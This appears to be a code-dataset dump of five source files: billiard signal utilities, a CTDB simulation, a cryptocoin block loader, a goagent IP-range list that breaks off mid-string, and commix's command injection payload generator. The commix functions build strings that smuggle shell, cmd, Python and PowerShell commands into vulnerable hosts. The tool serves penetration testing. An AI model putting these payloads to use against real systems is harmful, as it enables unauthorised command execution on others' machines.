repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
devs1991/test_edx_docmode
|
refs/heads/master
|
venv/lib/python2.7/site-packages/billiard/common.py
|
12
|
# -*- coding: utf-8 -*-
"""
This module contains utilities added by billiard, to keep
"non-core" functionality out of ``.util``."""
from __future__ import absolute_import
import os
import signal
import sys
import pickle as pypickle
try:
import cPickle as cpickle
except ImportError: # pragma: no cover
cpickle = None # noqa
from .exceptions import RestartFreqExceeded
from .five import monotonic
if sys.version_info < (2, 6): # pragma: no cover
# cPickle does not use absolute_imports
pickle = pypickle
pickle_load = pypickle.load
pickle_loads = pypickle.loads
else:
pickle = cpickle or pypickle
pickle_load = pickle.load
pickle_loads = pickle.loads
# cPickle.loads does not support buffer() objects,
# but we can just create a StringIO and use load.
if sys.version_info[0] == 3:
from io import BytesIO
else:
try:
from cStringIO import StringIO as BytesIO # noqa
except ImportError:
from StringIO import StringIO as BytesIO # noqa
# BSD sysexits.h "internal software error" code; used when the process
# fails to terminate cleanly after a termination signal (see
# _shutdown_cleanup below).
EX_SOFTWARE = 70
#: Termination signals handled by default by :func:`reset_signals`.
TERMSIGS_DEFAULT = (
    'SIGHUP',
    'SIGQUIT',
    'SIGTERM',
    'SIGUSR1',
    'SIGUSR2'
)
#: Extended termination-signal set, used by ``reset_signals(full=True)``.
#: Some of these (e.g. SIGEMT) do not exist on every platform; missing
#: names are skipped at install time.
TERMSIGS_FULL = (
    'SIGHUP',
    'SIGQUIT',
    'SIGTRAP',
    'SIGABRT',
    'SIGEMT',
    'SIGSYS',
    'SIGPIPE',
    'SIGALRM',
    'SIGTERM',
    'SIGXCPU',
    'SIGXFSZ',
    'SIGVTALRM',
    'SIGPROF',
    'SIGUSR1',
    'SIGUSR2',
)
#: set by signal handlers just before calling exit.
#: if this is true after the sighandler returns it means that something
#: went wrong while terminating the process, and :func:`os._exit`
#: must be called ASAP.
#: (a one-element list so the flag is mutable from within the handler)
_should_have_exited = [False]
def pickle_loads(s, load=pickle_load):
    """Unpickle *s*, accepting any bytes-like object.

    ``cPickle.loads`` cannot handle ``buffer()`` objects, so the data is
    wrapped in a file-like ``BytesIO`` and read with ``load`` instead.
    """
    buf = BytesIO(s)
    return load(buf)
def maybe_setsignal(signum, handler):
    """Best-effort ``signal.signal``.

    Installs *handler* for *signum*, silently ignoring environments
    where that is impossible (invalid signal for this platform,
    non-main thread, restricted interpreter, ...).
    """
    ignorable = (OSError, AttributeError, ValueError, RuntimeError)
    try:
        signal.signal(signum, handler)
    except ignorable:
        pass
def _shutdown_cleanup(signum, frame):
    # Termination-signal handler: restore the default disposition for
    # this signal, flag that we are exiting, then exit via sys.exit.
    # we will exit here so if the signal is received a second time
    # we can be sure that something is very wrong and we may be in
    # a crashing loop.
    if _should_have_exited[0]:
        os._exit(EX_SOFTWARE)
    maybe_setsignal(signum, signal.SIG_DFL)
    _should_have_exited[0] = True
    # NOTE(review): the negative status -(256 - signum) presumably
    # encodes "killed by signal signum" in the process exit status
    # (it wraps to 256 - (256 - signum) = signum modulo 256) -- confirm
    # against the callers that inspect the exitcode.
    sys.exit(-(256 - signum))
def reset_signals(handler=_shutdown_cleanup, full=False):
    """Install *handler* for every known termination signal.

    Signals not present on this platform are skipped, as are signals
    whose current disposition is "ignore" or unknown (``None``), so an
    inherited SIG_IGN from the parent process is respected.
    """
    names = TERMSIGS_FULL if full else TERMSIGS_DEFAULT
    for name in names:
        signum = getattr(signal, name, None)
        if signum is None:
            # not available on this platform
            continue
        current = signal.getsignal(signum)
        if current is None or current == signal.SIG_IGN:
            continue
        maybe_setsignal(signum, handler)
class restart_state(object):
    """Restart-frequency guard: allows at most ``maxR`` restarts within
    any moving window of ``maxT`` seconds.

    Call :meth:`step` once per restart; it raises
    :exc:`RestartFreqExceeded` when the limit is exceeded.
    """
    RestartFreqExceeded = RestartFreqExceeded
    def __init__(self, maxR, maxT):
        # maxR: maximum restarts allowed inside one maxT-second window.
        # R: restarts recorded so far; T: start time of current window.
        self.maxR, self.maxT = maxR, maxT
        self.R, self.T = 0, None
    def step(self, now=None):
        """Record one restart at time *now* (default: monotonic clock);
        raise :exc:`RestartFreqExceeded` if the frequency is too high."""
        now = monotonic() if now is None else now
        R = self.R
        if self.T and now - self.T >= self.maxT:
            # maxT passed, reset counter and time passed.
            self.T, self.R = now, 0
        elif self.maxR and self.R >= self.maxR:
            # verify that R has a value as the result handler
            # resets this when a job is accepted. If a job is accepted
            # the startup probably went fine (startup restart burst
            # protection)
            if self.R: # pragma: no cover
                self.R = 0 # reset in case someone catches the error
            raise self.RestartFreqExceeded("%r in %rs" % (R, self.maxT))
        # first run sets T
        if self.T is None:
            self.T = now
        self.R += 1
|
hackersql/sq1map
|
refs/heads/master
|
comm1x/src/core/injections/results_based/techniques/classic/cb_payloads.py
|
1
|
#!/usr/bin/env python
# encoding: UTF-8
"""
This file is part of Commix Project (http://commixproject.com).
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
from src.utils import settings
"""
The classic injection technique on Classic OS Command Injection.
The available "classic" payloads.
"""
"""
Classic decision payload (check if host is vulnerable).
"""
def decision(separator, TAG, randv1, randv2):
    """Build the classic decision payload (check if host is vulnerable).

    The payload echoes the TAG marker three times -- optionally with the
    result of ``randv1 + randv2`` in between -- so the HTTP response can
    be tested for the expected marker/number sequence.  ``%2B`` is the
    URL-encoded ``+``.
    """
    num1, num2 = str(randv1), str(randv2)
    if settings.TARGET_OS == "win":
        if settings.SKIP_CALC:
            return separator + "echo " + TAG + TAG + TAG + "< nul"
        # cmd's `set /a` performs the arithmetic; for /f re-echoes it
        # between the TAG markers without a trailing newline.
        calc = "set /a (" + num1 + "%2B" + num2 + ")"
        return (separator +
                "for /f \"tokens=*\" %i in ('cmd /c \"" + calc +
                "\"') do @set /p = " + TAG + "%i" + TAG + TAG + "< nul")
    # Unix targets: choose the arithmetic expansion form, and how the
    # middle TAG is echoed (plain when backticks are in use, otherwise
    # through a command substitution).
    if settings.USE_BACKTICKS:
        math_calc = "`expr " + num1 + " %2B " + num2 + "`"
        echoed_tag = TAG
    else:
        if not settings.WAF_ENABLED:
            math_calc = "$((" + num1 + "%2B" + num2 + "))"
        else:
            # WAF-friendlier variant of the arithmetic expansion.
            math_calc = "$(expr " + num1 + " %2B " + num2 + ")"
        echoed_tag = "$(echo " + TAG + ")"
    if settings.SKIP_CALC:
        return separator + "echo " + TAG + echoed_tag + TAG
    return separator + "echo " + TAG + math_calc + echoed_tag + TAG
"""
__Warning__: The alternative shells are still experimental.
"""
def decision_alter_shell(separator, TAG, randv1, randv2):
    """Decision payload using Python as an alternative shell.

    Same marker scheme as :func:`decision` but the echoing (and the
    ``randv1 + randv2`` arithmetic) is done by a python one-liner.
    ``%2B`` is the URL-encoded ``+``.

    __Warning__: the alternative shells are still experimental.
    """
    if settings.TARGET_OS == "win":
        if settings.SKIP_CALC:
            python_payload = settings.WIN_PYTHON_DIR + " -c \"print '" + TAG + "'%2B'" + TAG + "'%2B'" + TAG + "'\""
        else:
            python_payload = settings.WIN_PYTHON_DIR + " -c \"print '" + TAG + "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" + TAG + "'%2B'" + TAG + "'\""
        # for /f + `set /p` re-echoes the one-liner's output without a
        # trailing newline.
        payload = (separator +
                   "for /f \"tokens=*\" %i in ('cmd /c " +
                   python_payload +
                   "') do @set /p =%i< nul"
                   )
    else:
        if settings.SKIP_CALC:
            payload = (separator +
                       "python -c \"print'" + TAG +
                       TAG +
                       TAG + "'\""
                       )
        else:
            payload = (separator +
                       "python -c \"print'" + TAG +
                       "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" +
                       TAG + "'%2B'" +
                       TAG + "'\""
                       )
    return payload
"""
Execute shell commands on vulnerable host.
"""
def cmd_execution(separator, TAG, cmd):
    """Build the payload that executes *cmd* on the vulnerable host.

    The command's output is wrapped between TAG markers so it can be
    extracted from the HTTP response.  For REVERSE_TCP on Windows the
    command is injected bare (no markers needed).
    """
    if settings.TARGET_OS == "win":
        if settings.REVERSE_TCP:
            payload = (separator + cmd + " "
                       )
        else:
            payload = (separator +
                       "for /f \"tokens=*\" %i in ('cmd /c \"" +
                       cmd +
                       "\"') do @set /p = " + TAG + TAG + "%i" + TAG + TAG + "< nul"
                       )
    else:
        # if not settings.WAF_ENABLED:
        #   cmd_exec = "$(echo $(" + cmd + "))"
        # else:
        if settings.USE_BACKTICKS:
            # backtick command substitution; markers echoed plainly
            cmd_exec = "`" + cmd + "`"
            payload = (separator +
                       "echo " + TAG +
                       "" + TAG + "" +
                       cmd_exec +
                       "" + TAG + "" + TAG + ""
                       )
        else:
            # $() command substitution; markers echoed via $(echo ...)
            cmd_exec = "$(" + cmd + ")"
            payload = (separator +
                       "echo " + TAG +
                       "$(echo " + TAG + ")" +
                       cmd_exec +
                       "$(echo " + TAG + ")" + TAG + ""
                       )
    return payload
"""
__Warning__: The alternative shells are still experimental.
"""
def cmd_execution_alter_shell(separator, TAG, cmd):
    """Execute *cmd* on the vulnerable host via a Python one-liner.

    Output is wrapped between doubled TAG markers.  ``%2B`` is the
    URL-encoded ``+``.

    __Warning__: the alternative shells are still experimental.
    """
    if settings.TARGET_OS == "win":
        if settings.REVERSE_TCP:
            payload = (separator + cmd + " "
                       )
        else:
            # python -> os.system -> powershell echoes the command's
            # output between the doubled TAG markers.
            payload = (separator +
                       "for /f \"tokens=*\" %i in ('" +
                       settings.WIN_PYTHON_DIR + " -c \"import os; os.system('powershell.exe -InputFormat none write-host " + TAG + TAG + " $(" + cmd + ") "+ TAG + TAG + "')\"" +
                       "') do @set /p =%i< nul"
                       )
    else:
        if settings.USE_BACKTICKS:
            payload = (separator +
                       "python -c \"print'" + TAG + "'%2B'" + TAG + "'%2B'`" + cmd + "`" + TAG + "'%2B'" + TAG + "'\""
                       )
        else:
            payload = (separator +
                       "python -c \"print'" + TAG + "'%2B'" + TAG + "'%2B'$(" + cmd + ")'%2B'" + TAG + "'%2B'" + TAG + "'\""
                       )
    return payload
#eof
|
jkstrick/samba
|
refs/heads/master
|
ctdb/tests/takeover/simulation/node_group_simple.py
|
31
|
#!/usr/bin/env python
# This example demonstrates a simple, sensible node group
# configuration. When run with deterministic IPs (use "-d" to show
# the problem) it does many gratuitous IP reassignments.
from ctdb_takeover import Cluster, Node, process_args
# Parse simulation command-line options (e.g. -d for deterministic IPs).
process_args()
# Two disjoint groups of public IP addresses.
addresses1 = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']
addresses2 = ['I', 'J', 'K']
c = Cluster()
# 4 nodes able to host the first address group...
for i in range(4):
    c.add_node(Node(addresses1))
# ...3 nodes able to host the second group...
for i in range(3):
    c.add_node(Node(addresses2))
# ...and one node that hosts no public addresses at all.
c.add_node(Node([]))
# Initial IP assignment, then repeated random failover iterations.
c.recover()
c.random_iterations()
|
cryptocoinexplorer/Open-Source-CCE-4.0
|
refs/heads/master
|
dbload.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# dbload.py
#
# Copyright 2015 Hartland PC LLC
#
# This file is part of the of the database loader for CCE 4.0 (open source version).
#
# This package is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This package is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package. If not, see <http://www.gnu.org/licenses/>.
import sys
import stats
from comm import *
from decimal import *
def startcheck(lockdir, recheckdir):
    """Enforce a single running loader and detect recheck mode.

    Validates/creates the PID lock file at *lockdir*: exits the process
    silently if the recorded PID is still alive (Linux /proc check),
    removes a stale lock otherwise, then writes our own PID.

    Returns 'recheck' if the marker file at *recheckdir* already exists
    (a previous run did not finish cleanly), else creates the marker
    and returns 'normal'.
    """
    lockpath = os.path.expanduser(lockdir)
    # Check to see if the loader is already running and set lock file.
    if os.access(lockpath, os.F_OK):
        # Use `with` so the read handle is closed (the old code leaked it
        # by rebinding `pidfile` to the write handle below).
        with open(lockpath, "r") as pidfile:
            old_pid = pidfile.readline()
        if os.path.exists("/proc/%s" % old_pid):
            # Lock owner is still alive -- bail out quietly.
            sys.exit(0)
        else:
            # Stale lock left by a dead process; remove it.
            os.remove(lockpath)
    with open(lockpath, "w") as pidfile:
        pidfile.write("%s" % os.getpid())
    # Check for recheck file.
    ret = 'normal'
    recheckpath = os.path.expanduser(recheckdir)
    if os.access(recheckpath, os.F_OK):
        ret = 'recheck'
    else:
        # Create the marker; it is removed again on clean shutdown.
        with open(recheckpath, "w"):
            pass
    return ret
# Error Logging
def loader_error_log(msg, function_name='No function name provided'):
    """Append an error entry (UTC timestamp, message, origin) to
    ``loader.log`` in the current working directory."""
    stamp = time.strftime('%m-%d %H:%M:%S', time.gmtime())
    # basicConfig only takes effect on the first call; later calls are no-ops.
    logging.basicConfig(filename=str(os.getcwd() + "/loader.log"), level=logging.ERROR)
    logging.error('%s %s : %s' % (stamp, msg, function_name))
# Address accounting. If credit is true, amount is added to address, else amount is subtracted.
# count_tx determines if the number of transactions on an account is incremented, decremented or unchanged.
def accounting(address, amount, credit, count_tx):
    """Adjust the stored balance (and optionally tx count) of *address*.

    credit=True adds *amount* to the balance, otherwise it is
    subtracted (floored at zero).  count_tx is 'add' to increment the
    address's n_tx, 'subtract' to decrement it (kept non-negative via
    abs()), anything else leaves it unchanged.  Unknown addresses are
    inserted with *amount* as their initial balance.
    """
    try:
        ret = query_single('SELECT balance FROM address WHERE address = %s', address)
        if ret is None:
            # First time we see this address: create the row.
            ret = query_noreturn('INSERT INTO address (address,balance) VALUES(%s,%s)', address, amount)
            conn.commit()
        else:
            if credit:
                balance = Decimal(ret[0] + amount)
            else:
                balance = Decimal(ret[0] - amount)
            # Balances never go negative (rounding/ordering artifacts).
            if balance < 0:
                balance = Decimal(0)
            ret = query_noreturn('UPDATE address SET balance = %s WHERE address = %s', balance, address)
        if count_tx == 'add':
            ret = query_noreturn('UPDATE address SET n_tx = n_tx + 1 WHERE address = %s', address)
        elif count_tx == 'subtract':
            ret = query_noreturn('UPDATE address SET n_tx = abs(n_tx - 1) WHERE address = %s', address)
        conn.commit()
    except Exception as e:
        # Errors are logged but deliberately not re-raised: a failed
        # balance update must not abort the whole block load.
        loader_error_log(e, "Accounting loop error")
# Place data in table rows
def add_row(table, row_data):
    """Insert one row into *table* from the dict *row_data*.

    Only keys that match actual columns of the table (discovered via
    DESCRIBE) are inserted; extra keys are silently dropped.  Values are
    passed as query parameters, but *table* itself is interpolated into
    the SQL -- it must always come from trusted code, never user input.
    The caller is responsible for committing.
    """
    cur = conn.cursor()
    try:
        cur.execute("describe %s" % table)
        allowed_keys = set(row[0] for row in cur.fetchall())
        keys = allowed_keys.intersection(row_data)
        columns = ", ".join(keys)
        data_template = ", ".join(["%s"] * len(keys))
        sql = "insert into %s (%s) values (%s)" % (table, columns, data_template)
        data_tuple = tuple(row_data[key] for key in keys)
        cur.execute(sql, data_tuple)
    finally:
        # Always release the cursor -- the old code leaked it whenever
        # execute() raised.
        cur.close()
# Parse Transaction
def process_tx(tx_hash, blk_height):
    """Fetch, decode and store one transaction of block *blk_height*.

    Stores the raw/decoded tx (tx_raw), every output (tx_out) and input
    (tx_in), updates per-address balances via accounting(), and keeps
    the large_tx table up to date.  Returns the jsonrpc error dict on
    fetch/decode failure, otherwise
    ``{'Status': 'ok', 'Data': {'out': <total output value>}}``.
    """
    rawtx = jsonrpc("getrawtransaction", tx_hash)
    if rawtx['Status'] == 'error':
        loader_error_log(rawtx['Data'], str('Raw tx on block:' + blk_height))
        return rawtx
    decode = jsonrpc("decoderawtransaction", rawtx['Data'])
    if decode['Status'] == 'error':
        loader_error_log(decode['Data'], str('Decode tx on block:' + blk_height))
        return decode
    jsn_decode = json.dumps(decode['Data'])
    ret = query_noreturn('INSERT INTO tx_raw (tx_hash,raw,decoded,height) VALUES(%s,%s,%s,%s)', tx_hash, rawtx['Data'],
                         jsn_decode, blk_height)
    total_out = Decimal(0)
    # Transaction addresses are stored in tx_address to determine duplicate addresses in tx_in / tx_out.
    # POS chains use the same address in both tx_in and tx_out for the generation transaction.
    # If a duplicate address is found, the tx count for address will only be incremented once.
    tx_address = []
    for key in decode['Data']['vout']:
        try:
            key['address'] = key['scriptPubKey']['addresses'][0]
            tx_address.append(key['address'])
        # KeyError is not fatal, as generation transactions have no tx_in address
        except KeyError:
            key['address'] = "Unknown"
        key['asm'] = key['scriptPubKey']['asm']
        key['type'] = key['scriptPubKey']['type']
        key['height'] = blk_height
        key['tx_hash'] = tx_hash
        key['raw'] = rawtx['Data']
        # Convert via str() to avoid float artifacts in the Decimal.
        key['value'] = Decimal(str(key['value']))
        add_row('tx_out', key)
        if key['address'] != 'Unknown':
            accounting(key['address'], key['value'], True, 'add')
        conn.commit()
        total_out = Decimal(total_out + key['value'])
    # If the transaction total out is larger then the lowest entry on the large tx table,
    # replace the lowest transaction with this transaction
    try:
        low = query_single('SELECT * FROM large_tx ORDER BY amount ASC LIMIT 1')
        if total_out > low[1]:
            ret = query_noreturn('UPDATE large_tx SET tx = %s,amount = %s WHERE tx = %s', tx_hash, total_out,low[0])
    # Exceptions in this block are non-fatal as the information value of the transaction itself far exceeds the value of large_tx
    except:
        pass
    for key in decode['Data']['vin']:
        try:
            key['asm'] = key['scriptSig']['asm']
            key['hex'] = key['scriptSig']['hex']
            key['prev_out_hash'] = key['txid']
            # Look up the output being spent to recover address/value.
            ret = query_single('SELECT * FROM tx_out WHERE tx_hash = %s AND n = %s', key['prev_out_hash'], key['vout'])
            if not ret:
                key['address'] = 'Not Available'
                key['value_in'] = Decimal(total_out)
            else:
                count_tx = 'add'
                key['address'] = str(ret[4])
                key['value_in'] = ret[2]
                if key['address'] in tx_address:
                    count_tx = 'no'
                accounting(key['address'],key['value_in'],False,count_tx)
        # Exceptions occur in this loop due to POW generation transactions.
        # The value of tx_in and tx_out are always the same in these types of transactions
        except Exception:
            key['value_in'] = total_out
        key['tx_hash'] = tx_hash
        key['height'] = blk_height
        add_row('tx_in', key)
    return {'Status': 'ok', 'Data': {'out': total_out}}
# Parse block
def process_block(blk_height):
    """Fetch block *blk_height* from the daemon, store it and process
    all of its transactions.

    Returns ``{'Status': 'ok'}`` on success, otherwise
    ``{'Status': 'error', 'Data': <exception>}``.
    """
    try:
        if blk_height == -1:
            raise Exception('Bad block height (-1)')
        counter = 0
        total_sent = Decimal(0)
        b_hash = jsonrpc("getblockhash", blk_height)['Data']
        block = jsonrpc("getblock", b_hash)['Data']
        # In POS chains, nonce is used to determine if a block is POS.
        # The 'flags' field in the daemon output is unreliable due to different verbiage and multiple flags.
        # Merged mine chains also use 0 in the nonce field. This system will not work with POS merged mined chains.
        # POS merged mined compatibility will be added in the future
        if CONFIG["chain"]["pos"] == 'true' and block['nonce'] == 0:
            counter = 1
        for key in block['tx']:
            # counter walks 1 -> 2 -> 0: on a POS block the second tx is
            # the staking transaction, recorded in block['pos'].
            if counter == 1:
                counter = 2
            elif counter == 2:
                block['pos'] = key
                counter = 0
            prostx = process_tx(key, blk_height)
            if prostx['Status'] == 'error':
                raise Exception(prostx['Data'])
            total_sent = Decimal(total_sent + prostx['Data']['out'])
        block['raw'] = json.dumps(block, sort_keys=False, indent=1)
        add_row('block', block)
        conn.commit()
        ret = query_noreturn('UPDATE block SET total_sent = %s, n_tx = %s WHERE height = %s',
                             total_sent, len(block['tx']), blk_height)
        conn.commit()
    except Exception as e:
        return {'Status':'error','Data':e}
    return {'Status':'ok'}
# Orphan correction. Copy to orphan tables,delete block/tx information, and re-parse block.
# If recheck is true, block/tx information is not copied to orphan tables.
def orphan(blk_height, recheck=False):
    """Handle an orphaned block: archive it, undo its accounting,
    delete it, and re-parse the block from the daemon.

    With recheck=True the block/tx rows are NOT copied to the orphan
    tables first (used by the periodic recheck pass).  Errors are
    logged and rolled back rather than raised.
    """
    try:
        if not recheck:
            loader_error_log("Orphan routine called", blk_height)
            # Archive the block and raw-tx rows before deleting them.
            ret = query_noreturn('INSERT INTO orph_block SELECT * FROM block WHERE height = %s', blk_height)
            ret = query_noreturn('INSERT INTO orph_tx_raw SELECT * FROM tx_raw WHERE height = %s', blk_height)
        ret = query_noreturn('DELETE FROM block WHERE height = %s', blk_height)
        ret = query_noreturn('DELETE FROM tx_raw WHERE height = %s', blk_height)
        # Reverse the balance/tx-count effects of the orphaned block.
        txin = query_multi('SELECT * FROM tx_in WHERE height = %s', blk_height)
        for key in txin:
            if key[7] != '0':
                accounting(str(key[7]),key[6], True,'subtract')
        txout = query_multi('SELECT * FROM tx_out WHERE height = %s', blk_height)
        for key in txout:
            accounting(str(key[4]),key[2], False,'subtract')
        if not recheck:
            ret = query_noreturn('INSERT INTO orph_tx_in SELECT * FROM tx_in WHERE height = %s', blk_height)
            ret = query_noreturn('INSERT INTO orph_tx_out SELECT * FROM tx_out WHERE height = %s', blk_height)
            # NOTE(review): tx_raw was already copied and deleted above,
            # so this second orph_tx_raw insert copies nothing -- confirm
            # whether it is redundant.
            ret = query_noreturn('INSERT INTO orph_tx_raw SELECT * FROM tx_raw WHERE height = %s', blk_height)
        ret = query_noreturn('DELETE FROM tx_in WHERE height = %s', blk_height)
        ret = query_noreturn('DELETE FROM tx_out WHERE height = %s', blk_height)
        ret = query_noreturn('DELETE FROM tx_raw WHERE height = %s', blk_height)
        ret = process_block(blk_height)
        # BUG FIX: process_block returns the key 'Status' (capitalised);
        # the old ret['status'] lookup raised KeyError on every call,
        # mis-reporting each recovery as an "Orphan loop error" and
        # rolling back the re-parse.
        if ret['Status'] == 'error':
            raise Exception(ret['Data'])
        conn.commit()
    except Exception as e:
        loader_error_log(e, "Orphan loop error")
        conn.rollback()
    if not recheck:
        loader_error_log('Successful orphan recovery: ', str(blk_height))
def main(argv):
    """Loader entry point.

    Flags in *argv*: -n new database (full reload, 24h timeout),
    -r recheck last 5 blocks, -v verbose to stderr, -l 24h timeout.
    Acquires the PID lock, syncs the database up to the daemon's block
    height, fixes orphans, then optionally runs the stats module.
    """
    lockdir = str(os.getcwd() + "/" + "dataload.lock")
    recheckdir = str(os.getcwd() + "/" + "recheck")
    startmode = startcheck(lockdir, recheckdir)
    verbose = False
    # Set cowtime (loader timeout) to 5 minutes
    cowtime = 60 * 5
    try:
        for opt in argv:
            # Set new database mode and cowtime to 24 hours if -n flag
            if opt == '-n':
                startmode = 'newdb'
                cowtime = 60 * 60 * 24
            # Run recheck if -r flag
            elif opt == '-r' and startmode != 'newdb':
                startmode = 'recheck'
            # Send verbose messages to stderr if -v flag
            elif opt == '-v':
                verbose = True
            # Set cowtime to 24 hours if -l flag
            elif opt == '-l':
                cowtime = 60 * 60 * 24
    except:
        pass
    try:
        with timeout(cowtime, exception=Exception('DBLoader Timeout')):
            # Get block heights
            daemon = jsonrpc("getblockcount")
            if daemon['Status'] != 'error':
                top_height = daemon['Data']
                blk_height = query_single('SELECT height FROM block ORDER BY height DESC LIMIT 1')
                if not blk_height:
                    blk_height = 1
                else:
                    # Resume one past the highest stored block.
                    blk_height = int(blk_height[0] + 1)
            else:
                loader_error_log(daemon['Data'], 'Get Block Height')
                raise Exception(daemon['Data'])
            # Sleep is needed to allow the daemon time to catch orphans
            if startmode != 'newdb':
                time.sleep(15)
            # Recheck mode, re-parse the last 5 blocks in the database
            if startmode == 'recheck' and blk_height > 5:
                if verbose:
                    print >> sys.stderr, "Recheck Called"
                for blk in range(blk_height - 5, blk_height):
                    orphan(blk, True)
            # Check last (blockcheck) blocks for orphans and fix if needed
            blockcheck = int(CONFIG["loader"]["blockcheck"])
            if blk_height > blockcheck:
                for blk in range(blk_height - blockcheck, blk_height):
                    d_hash = jsonrpc('getblockhash', blk)
                    db_hash = query_single('SELECT hash FROM block where height = %s', blk)[0]
                    if d_hash['Data'] != db_hash:
                        orphan(blk)
            # Genesis block TX needs to be entered manually. Process block information only
            if startmode == 'newdb':
                b_hash = jsonrpc("getblockhash", 0)['Data']
                block = jsonrpc("getblock", b_hash)['Data']
                block['raw'] = json.dumps(block, sort_keys=False, indent=1)
                add_row('block', block)
                # Set up top_address table
                for i in range(int(CONFIG['stat']['richlistlen'])):
                    ret = query_noreturn('INSERT INTO top_address (rank) VALUES(%s)', i + 1)
                # Set up stats table
                ret = query_noreturn('INSERT INTO stats (peer_txt) VALUES("None")')
                blk_height = 1
            # Process blocks loop
            while blk_height <= top_height:
                ret = process_block(blk_height)
                if ret['Status'] == 'error':
                    raise Exception(ret['Data'])
                # After the first 100 blocks of a fresh load, seed the
                # large_tx table from everything parsed so far.
                if startmode == 'newdb' and blk_height == 101:
                    ret = query_noreturn('TRUNCATE large_tx')
                    time.sleep(5)
                    ret = query_noreturn('INSERT INTO large_tx SELECT tx_hash,SUM(value) FROM tx_out GROUP BY tx_hash ORDER BY SUM(value) DESC LIMIT 100')
                blk_height += 1
                if verbose:
                    print >> sys.stderr, 'Processing Block: ', blk_height, ' of ', top_height, '\r',
            # Call Statistics module
            if CONFIG['loader']['stats'] == 'true':
                if verbose:
                    print >> sys.stderr, '\nCalling Statistics Module'
                stats.main()
    except Exception as e:
        # Any failure: log, release the lock and exit; the recheck
        # marker is deliberately left in place so the next run re-parses
        # recent blocks.
        loader_error_log(str(e), 'Main loop')
        conn.close()
        os.remove(os.path.expanduser(lockdir))
        if verbose:
            print >> sys.stderr, '\nMain Loop', str(e)
        sys.exit(0)
    # Clean up
    conn.close()
    if verbose:
        print >> sys.stderr, "Database load complete"
    os.remove(os.path.expanduser(recheckdir))
    os.remove(os.path.expanduser(lockdir))
if __name__ == '__main__':
    main(sys.argv[1:])
|
lichuan261/wuand
|
refs/heads/master
|
XX-Net/goagent/3.1.49/local/generate_ip_range.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ip_utils
__author__ = 'moonshawdo@gamil.com'
# read ip range string
# order it
# merge over lapped
# Then reproduce good format file
# check it.
import re
ip_str_list = '''
1.179.248.0-1.179.248.255
4.3.2.0/24
8.6.48.0-8.6.55.255
8.8.4.0/24
8.8.8.0/24
8.22.56.0-8.22.63.255
8.34.208.0-8.34.223.255
8.35.192.0-8.35.207.255
12.216.80.0-12.216.80.255
24.156.131.0-24.156.131.255
41.206.96.0-41.206.96.255
60.199.175.18-60.199.175.187
61.19.1.30-61.19.1.109
61.219.131.84-61.219.131.251
62.116.207.0-62.116.207.63
62.197.198.193-62.197.198.251
63.211.200.72-63.211.200.79
64.15.112.0-64.15.117.255
64.15.119.0-64.15.126.255
64.18.0.0-64.18.15.255
64.41.221.192-64.41.221.207
64.68.64.64-64.68.64.127
64.68.80.0-64.68.95.255
64.154.178.208-64.154.178.223
64.233.160.0-64.233.191.255
66.102.0.0-66.102.15.255
66.249.64.0-66.249.95.255
70.32.128.0-70.32.159.255
70.90.219.48-70.90.219.55
70.90.219.72-70.90.219.79
72.14.192.0-72.14.255.255
74.125.0.0-74.125.255.255
78.37.100.0/24
80.64.175.0/24
80.228.65.128-80.228.65.191
81.175.29.128-81.175.29.191
84.235.77.0-84.235.77.255
85.182.250.0-85.182.250.255
86.127.118.128-86.127.118.191
93.94.217.0-93.94.217.31
93.94.218.0-93.94.218.31
93.183.211.192-93.183.211.255
94.40.70.0-94.40.70.63
94.200.103.64-94.200.103.71
95.54.196.0/24
106.162.192.148-106.162.192.187
106.162.198.84-106.162.198.123
106.162.216.20-106.162.216.123
108.59.80.0-108.59.95.255
108.170.192.0-108.170.255.255
108.177.0.0-108.177.127.255
111.168.255.20-111.168.255.187
113.197.105.0-113.197.105.255
114.4.41.0/24
118.174.24.0-118.174.27.255
121.78.74.68-121.78.74.123
123.205.250.0-123.205.250.255
123.205.251.68-123.205.251.123
139.175.107.88/24
142.250.0.0-142.251.255.255
162.216.148.0-162.216.151.255
166.90.148.64-166.90.148.79
172.217.0.0-172.217.255.255
172.253.0.0-172.253.255.255
173.194.0.0-173.194.255.255
178.45.251.84-178.45.251.123
178.60.128.1-178.60.128.
192.158.28.0-192.158.31.255
192.178.0.0-192.179.255.255
193.92.133.0-193.92.133.63
193.120.166.64-193.120.166.127
194.78.99.0-194.78.99.255
194.221.68.0-194.221.68.255
195.249.20.192-195.249.20.255
198.108.100.192-198.108.100.207
199.87.241.32-199.87.241.63
199.192.112.0-199.192.115.255
199.223.232.0-199.223.239.255
202.39.143.1-202.39.143.123
202.169.193.0/24
203.66.124.129-203.66.124.251
203.116.165.148-203.116.165.251
203.117.34.148-203.117.34.187
203.165.13.210-203.165.13.251
203.165.14.210-203.165.14.251
203.208.32.0-203.208.63.255
203.211.0.20-203.211.0.59
207.126.144.0-207.126.159.255
207.223.160.0-207.223.175.255
208.21.209.0-208.21.209.15
208.117.224.0-208.117.239.55
208.117.233.0/24
208.117.240.0-208.117.255.255
209.85.128.0-209.85.255.255
209.185.108.128-209.185.108.255
209.245.184.136-209.245.184.143
209.247.159.144-209.247.159.159
210.61.221.148-210.61.221.187
210.139.253.20-210.139.253.251
210.153.73.20-210.153.73.123
213.158.11.0/24
210.158.146.0/24
210.242.125.20-210.242.125.59
210.245.14.0/24
212.188.15.0-212.188.15.255
213.186.229.0-213.186.229.63
213.240.44.0-213.240.44.31
216.33.229.0/24
